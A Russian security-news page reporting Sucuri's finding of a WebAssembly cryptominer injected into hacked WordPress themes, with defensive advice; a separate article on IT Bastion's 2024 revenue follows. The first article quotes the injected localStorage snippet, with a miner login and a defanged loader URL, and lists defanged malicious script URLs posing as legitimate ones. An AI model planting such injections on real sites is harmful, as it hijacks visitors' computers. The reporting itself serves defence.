Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Криптоджекеры начали прятать свой код на сайтах с помощью WebAssembly

Эксперты Sucuri обнаружили необычный JavaScript-майнер, загружаемый на страницы при посещении взломанного сайта. Злоумышленники используют технологию WebAssembly, чтобы ускорить исполнение сценария и осложнить выявление вредоносных инъекций.

Бинарный формат WebAssembly (.wasm), позволяющий выполнять высокопроизводительные приложения на веб-страницах со скоростью, близкой к нативной, в настоящее время поддерживают более 95% установленных браузеров, в том числе Google Chrome, Microsoft Edge, Safari, Firefox и Opera. Код Wasm загружается и запускается из JavaScript и может работать в параллель в той же песочнице, обмениваясь данными с кодом JavaScript.

В Sucuri узнали о нововведении криптоджекеров, когда новый клиент запросил помощи— его компьютер начал сильно тормозить при подключении к персональному сайту WordPress. Беглый просмотр файлов на сайте выявил небольшой фрагмент кода, вставленный в один из файлов темы:

localStorage.setItem('f', 'auto.config({ login: "6110659", pass: "auto" }).power(10);');localStorage.setItem('s', 'hxxps://wm[.]bmwebm[.]org/auto.js');

Каждый раз, когда посетитель заходит на веб-страницу, этот сниппет загружает на стороне клиента скрипт auto.js из домена wm[.]bmwebm[.]org. Содержимое JavaScript-файла оказалось обфусцированным с помощью CharCode; декодирование показало, что это криптомайнер, стартующий при каждом визите на сайт.

Вшитые учетные данные, по всей видимости, используются для доступа к кастомному пулу в том же домене. Особый интерес у исследователей вызвала такая находка, как использование WebAssembly для запуска бинарного кода в среде браузера.

 

Расшифрованный auto.js также содержал инструкции для операций майнинга, которые исполняются в браузере вместе с JavaScript.

Позднее тот же самый криптомайнер был обнаружен на другом взломанном сайте, но уже под именем adservicegoogle.js. Он загружался из того же домена и пытался выдать себя за легитимный скрипт Google Ads.

Домен hxxps://wm[.]bmwebm[.]org/ был зарегистрирован в январе 2021 года, то есть полтора года криптоджекерам удавалось остаться незамеченными. В настоящее время (на 26 июля) их майнер работает на 195 сайтах, в том числе в TLD-зоне RU; по всей видимости, скромный масштаб киберкампании тоже помог злоумышленникам оставаться в тени.

Примечательно, что отдаваемые вредоносные JavaScript-файлы генерируются автоматически — злоумышленники просто меняют имя, добавляемое к домену:

  • hxxps://wm[.]bmwebm[.]org/wordpresscore.js
  • hxxps://wm[.]bmwebm[.]org/common.js
  • hxxps://wm[.]bmwebm[.]org/facebook-sdk.js
  • hxxps://wm[.]bmwebm[.]org/twitter.js
  • hxxps://wm[.]bmwebm[.]org/node.js

Реализованная функциональность также позволяет внедрять скрипты в разные места на зараженном сайте и поддерживать видимость легитимности инъекций.

Эксперты ожидают расширения использования WebAssembly киберкриминалом, несмотря на очевидное ограничение — зависимость от JavaScript. Код Wasm не способен самостоятельно собирать данные, подключаться к интернету и сливать награбленное на сторону. В составе веб-скимера, например, такой компонент может диктовать JavaScript, на каких веб-формах сосредоточиться, какой домен использовать для вывода данных и т. п. 

Использование Wasm, по словам Sucuri, способно затруднить выявление злонамеренных редиректоров, вредоносной рекламы, ложной техподдержки, скриптовых кейлоггеров, скрытых загрузок (drive-by) и других неблаговидных способов использования браузера. В тех случаях, когда браузер содержит уязвимость 0-day, оперирующий Wasm злоумышленник может причинить еще больше вреда — путем использования бинарного кода для эксплойта, и такую функциональность вряд ли обнаружит антивирусный сканер, заточенный под строковый анализ.

На сайтах подобные заражения тоже трудно выявить, если не с чем сравнить (нет бэкапа). Там, где Wasm уже используется в повседневных операциях, задача еще больше усложняется. Предотвратить инфицирование, по мнению экспертов, помогут следующие меры:

  • поддержка всего софта (CMS, плагинов, тем) в актуальном состоянии;
  • усиление защиты сайта и админ-панелей от брутфорса и словарных атак;
  • создание бэкапа и регулярное копирование контента и базы данных, с сохранением резервных копий вне сайта;
  • регулярные проверки целостности содержимого файлов на сайте;
  • использование средств фильтрации трафика прикладного уровня (WAF).
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Выручка АйТи Бастион за 2024 год превысила 2 млрд рублей

В 2024 году выручка компании «АйТи Бастион» увеличилась на 18% по сравнению с предыдущим годом и превысила 2 млрд рублей. Количество заказчиков выросло на 25%. Основной вклад в выручку обеспечила PAM-платформа СКДПУ НТ. Впервые решение было приобретено также компаниями из сфер оптовой торговли и курортного обслуживания.

Ключевые обновления платформы

В 2024 году платформа СКДПУ НТ претерпела серьёзные улучшения. Основное внимание было уделено оптимизации подсистемы «Шлюз доступа»: энергопотребление процессора при сборе логов и фиксации запрещённых действий удалось снизить на 50%, а использование оперативной памяти — на 20%. Среди новых функций — авторизация на целевых устройствах с использованием смарт-карт и возможность кастомизации интерфейса селектора RDP-прокси. Также был обновлён пользовательский интерфейс платформы, который стал современнее и удобнее.

Знаковые проекты

Среди наиболее значимых контрактов 2024 года в компании отметили:

  • проект с ГК «Ростех» по миграции с иностранного PAM-решения на отечественное;
  • внедрение СКДПУ НТ в инфраструктуру аэропорта Пулково;
  • сотрудничество с системно значимым банком по обеспечению безопасного доступа к ключевым ИТ-ресурсам.

Также была проведена интеграция платформы с решениями партнёров, включая виртуальную инфраструктуру Basis Workplace и систему InfoWatch ARMA для защиты информации в АСУ ТП.

Развитие «Синоникса»

Система защищённого информационного обмена «Синоникс» в 2024 году была включена в реестр отечественного ПО. Она получила новые функции, в числе которых:

  • антивирусная проверка передаваемых файлов;
  • фиксация перемещений объектов между сетями.

Также начата процедура сертификации системы во ФСТЭК России.

Ожидания на 2025 год

Компания прогнозирует дальнейший рост спроса на системы контроля и управления доступом, чему будет способствовать вступление в силу новых норм, ужесточающих ответственность за утечки данных. Увеличение штрафов должно стимулировать инвестиции в средства защиты. Отмечается также высокий интерес к повышению эффективности уже внедрённых систем ИБ, включая их интеграцию и автоматизацию.

«В начале 2024 года мы ожидали рост на уровне 35–40%, опираясь на прогнозы аналитиков по рынку ИБ. Однако реальность внесла коррективы: по данным Центра стратегических разработок, общий рост составил лишь 28%. Рост ключевой ставки привёл к переносу ряда проектов на 2025 год. При этом киберугрозы продолжали эволюционировать: массовым и результативным атакам подверглись предприятия промышленности, объекты КИИ, ИТ- и телеком-компании. Всё чаще речь идёт о взломах через подрядчиков, что особенно тревожит участников цепочек поставок. Пик импортозамещения пройден, и сейчас заказчики всё чаще переходят с одного отечественного решения на другое. Отдельный тренд — ужесточение регуляторных требований: ФСТЭК России обновила нормативную базу, а в госсекторе были введены более жёсткие правила выполнения требований закона 187-ФЗ «О безопасности КИИ». Всё это повышает спрос на зрелые решения в сфере информационной безопасности», — отметил генеральный директор ООО «АйТи Бастион» Сергей Бочкарёв.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru